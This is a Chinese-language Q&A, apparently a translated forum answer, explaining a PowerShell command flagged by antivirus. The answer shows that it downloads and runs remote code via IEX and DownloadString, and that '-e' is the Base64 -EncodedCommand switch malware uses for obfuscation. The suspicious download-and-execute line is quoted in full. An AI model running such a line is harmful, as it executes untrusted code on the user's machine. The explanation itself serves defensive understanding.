我的防病毒软件不断通过下面提到的 powershell 命令提醒我。我对 Powershell 有点熟悉,但不明白 powershell 脚本下面的作用。另外最重要的是我想知道命令行中使用的“-e”参数是什么
可疑的命令行:
powershell -e sqbfafgakaboaguadwatae8aygbqaguaywb0acaatgblahqalgbxaguaygbdagwaaqbl
可疑脚本:
IEX(New-Object Net.WebClient).DownloadString('https://example.org/xmpsdh')
至于脚本:
IEX((New-Object Net.WebClient).DownloadString('https://example.org/xmpsdh'))从给定的 URL下载一个字符串并尝试将其作为 PowerShell 命令执行,通过(通常要避免的)cmdletIEX的内置别名。Invoke-Expression
换句话说:它从网站下载未知的 PowerShell 命令并执行它们。
至于命令行:
-e是PowerShell CLI-EncodedCommand参数的缩写,它接受作为Base64编码字符串的命令。
此参数的目的是启用复杂命令字符串的稳健传递,而不会遇到引用和转义问题。
然而,恶意软件使用该参数作为一种混淆技术:您无法轻易判断该命令在做什么。
例子:
# -e is short for -EncodedCommand
powershell -e RwBlAHQALQBEAGEAdABlACAALQBGAG8AcgBtAGEAdAAgAHkAeQB5AHkA
相当于:
powershell -Command "Get-Date -Format yyyy"
您可以对给定的 Base64 编码参数进行解码,如下所示:
$base64 = 'RwBlAHQALQBEAGEAdABlACAALQBGAG8AcgBtAGEAdAAgAHkAeQB5AHkA'
# -> 'Get-Date -Format yyyy'
[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($base64))
相反,如果您想对字符串进行Base64 编码-EncodedCommand:
$command = 'Get-Date -Format yyyy'
# -> 'RwBlAHQALQBEAGEAdABlACAALQBGAG8AcgBtAGEAdAAgAHkAeQB5AHkA'
[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($command))